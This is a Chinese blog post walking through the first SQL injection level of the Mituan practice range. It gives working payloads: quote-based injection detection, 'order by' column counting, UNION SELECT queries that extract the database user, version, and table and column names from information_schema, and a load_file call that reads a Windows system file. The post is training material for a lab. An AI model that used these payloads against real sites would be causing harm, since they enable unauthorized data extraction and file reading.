Mituan Less-1

最新推荐文章于 2021-08-13 17:33:36 发布
最新推荐文章于 2021-08-13 17:33:36 发布
阅读量202 收藏
点赞数
分类专栏: Mituan
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45728648/article/details/119677765
版权

第一关:

 点击后出现以下界面:

 如未出现Your Login name:

                You Password:

则在网址中app.后加入

 mituan.zone/Less-1/?id=1

 推荐HackBar插件可以更加直观的编写代码执行

试一下参数

输入'

发现无返回数据说明‘进入了select查询语句(发现注入点)

利用 order by 语句排列发现排列4列时报错得出只有3列

1' order by 3%23

 注:在网页中空格是%20,单引号是%27, 井号是%23,双引号是%22有时网页会屏蔽特殊字符

得到了列数我们即可用union联合查询查出我们想要的数据

Select user()-------获得当前登陆账号
Select version() ---获得数据库版本
Select database()---获得当前数据库
@@datadir----(数据库的存储路径)
@@hostname----(数据库主机名)
@@VERSION-----(数据库版本号)
@@Version_compile_os-----(数据库的操作系统版本)
' union select null,load_file('c:/windows/win.ini')------(读取文件)
concat_ws(char(32,58,32),1,2,3)-------连接字符串

 例如:搜索当前登录账号以及数据库版本号

-1'  union select 1,user(),version()%23

使用mysql的数据库information_schema, 里面记录所有数据库名,数据库的表,列的数据类型等

-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1%23

注:我们通常将数据库名,表名转换成16进制防止网页报错或拦截 

-1' union select 1,1,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273  limit 1,1 %23

 

 MySql拼接语句(group_concat)

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [separator '分隔符'])

Xiao_ze丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webug4.0通关笔记----(第一天:显错注入)
liver100day的博客
04-23 749
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
SQLI -LABS靶场练习1-10
qq_45314073的博客
10-11 1919
LESS1: 1.判断是否动态网站 根据输入内容,返回不同的页面,如果是,则为动态网站,例如这里我们输入id=1与id=2返回不同的页面 2.找潜在注入点 搜索框或URL尾端加 ' 如果报错则可能存在sql注入漏洞 3.猜测后台SQL语句 select * from t_xx where xid=1…… 4.判断是数字型还是字符型 Less-1/?id=2-1 //发现与输入id=2的页面相同,也就是并没有进行运算,初步判断为字符型 注:?是否能用+判断 //不能,在浏览器里加号会.
order by 1,2这个是什么意思,该如何解决
热门推荐
evilcry2012的专栏
09-27 1万+
order by 1,2这个是什么意思,该如何解决 order by 1,2这个是什么意思 select   owner,table_name,tablespace_name,blocks,last_analyzed  from   all_tables   order   by   1,2;  想问问这个是什么意思??  or
MySql(二十)--为排序使用索引Order By优化
csdn_kenneth的博客
10-05 1万+
    CREATE TABLE `tblA`( `id` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, `age` INT(11) DEFAULT NULL, `birth` timestamp not NULL )ENGINE=INNODB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8; ...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
mrcrowl.easy-less-1.7.2.zip
03-25
《深入解析mrcrowl.easy-less-1.7.2.zip:轻松驾驭LESS语言的VSCode插件》 在Web开发领域,LESS是一种强大的CSS预处理器,它扩展了CSS的功能,引入了变量、嵌套规则、混合(mixins)以及函数等特性,使得CSS代码...
mrcrowl.easy-less-1.7.3
12-07
《深入浅出:mrcrowl.easy-less-1.7.3——简化LESS CSS编程的艺术》 在Web前端开发领域,CSS(层叠样式表)是不可或缺的一部分,它赋予网页丰富的样式与布局。然而,随着网页设计的复杂度不断提升,CSS代码的维护和...
sqli-lab第二关
qq_51663706的博客
03-21 98
判断可显示数量 ?id=1 order by 3%23
在一个宽字节注入习题的情况下得到的知识集合
zezai3010的博客
12-13 948
一、数据库schema的解释 数据库中Schema和Database有什么区别 - 人生似烟的日志 - 网易博客 http://blog.163.com/baibai_zheng/blog/static/51980755201022125325689/ 在MySQL中创建一个Schema好像就跟创建一个Database是一样的效果,在SQL Server和Orcal数据库中好像又不一样. 目
Sql注入(Mituan靶机环境)
weixin_45728648的博客
08-13 473
一、Miyuan环境网址 https://mituan.zone/#/login 注册: 登录: 配置环境 注:环境持续4小时若想长时间使用在还剩一小时时续时 点击Setup/reset Database for labs配置环境 如出现下图,即为成功 ...
谜团靶机writeup - DVWA-高等级靶场通关指南
小龙人
01-10 1108
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA高等级靶场。 Brute Force 抓包后,注意修改token,初始token为Extract请求数据包中的token,线程为1。 Command Inje.
谜团靶场_sql注入
m0_54525483的博客
06-09 482
Less-1 检测id的字段类型 分别构造如下payload,比对返回结果 xxxxxxxx.app.mituan.zone/Less-1/?id=1 xxxxxxxx.app.mituan.zone/Less-1/?id=2 xxxxxxxx.app.mituan.zone/Less-1/?id=1+1 可以发现id=1+1与id=1的返回结果是一样的,说明1+1并没有被执行,基本可以认定id的字段类型为STRING或者类似非数字类型。 寻找注入点 首先使用基本起手式,
深入浅出Zookeeper之二Session建立
吊丝码农
12-26 308
上一篇,小编给大家介绍了zookeeper server端的启动。这一篇将来说一下client和server端是如何建立session的。通过官网的DataMonitor例子来说明。通过Session建立这个例子,可以大概知道client端和server端是如何处理请求的,之间是如何通信的。 官网Datamonitor的代码: Executor   public class Executo...
sqlserver镜像简介
mituan1234567的专栏
08-15 1269
http://blog.csdn.net/hailang9027/article/details/8440212 一、 镜像简介 1、 简介 数据库镜像是将数据库事务处理从一个SQL Server数据库移动到不同SQL Server环境中的另一个SQL Server数据库中。镜像不能直接访问;它只用在错误恢复的情况下才可以被访问。 要进行数据库镜像所需的最小需求包括了两
Mituan Less-2
weixin_45728648的博客
08-13 106
第二题让输入数字型ID与第一题大同小异只不过不需要'闭合语句了 输入id=1 输入order by语句进行排序 1 order by 1%23 同样发现order by=4时报错 我们现在知道列数了即可用union做联合查询,可以查出你想要的内容 内容同Less-1中内容。 https://blog.csdn.net/weixin_45728648/article/details/119677765?utm_source=app&app_version=4....
SQLSERVER 锁定记录,只允许单用户修改的例子
mituan1234567的专栏
04-29 918
http://bbs.csdn.net/topics/300001895 锁定记录,只允许单用户修改的例子   create table #锁表(编号 int)   --代码: if exists(select 1 from 编号='你的编号')    return   insert #锁表 values('你的编号')
安装less-loader 和less
最新发布
09-08
安装less-loader和less的步骤如下: 1. 确定你正在使用的webpack版本。根据webpack的版本选择合适的less-loader版本。例如,如果你使用的是webpack@4,那么可以选择less-loader@5~7版本。 2. 打开命令行终端,运行以下命令来安装less-loader: ``` npm install less-loader@7 --save-dev ``` 3. 确保你已经安装了webpack和webpack-cli。如果还没有安装,请运行以下命令来安装它们: ``` npm install webpack webpack-cli --save-dev ``` 4. 在webpack配置文件(通常是webpack.config.js)中添加less-loader的配置。参考以下示例: ``` module.exports = { // ... module: { rules: [ { test: /.less$/, use: [ { loader: "style-loader" }, { loader: "css-loader" }, { loader: "less-loader", options: { strictMath: true, noIeCompat: true } } ] } ] } }; ``` 5. 在需要使用less语法的样式文件中,将style节点的lang属性设置为'less'。例如: ```html <style lang="less" scoped> /* 样式内容 */ </style> ``` 总结:按照以下步骤安装less-loader和less: 1. 确定webpack的版本,选择合适的less-loader版本; 2. 使用npm命令安装less-loader,例如:npm install less-loader@7 --save-dev; 3. 确保已安装webpack和webpack-cli,如果没有请使用npm install webpack webpack-cli --save-dev安装; 4. 在webpack配置文件中添加less-loader的配置; 5. 在需要使用less语法的样式文件中,将style节点的lang属性设置为'less'。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值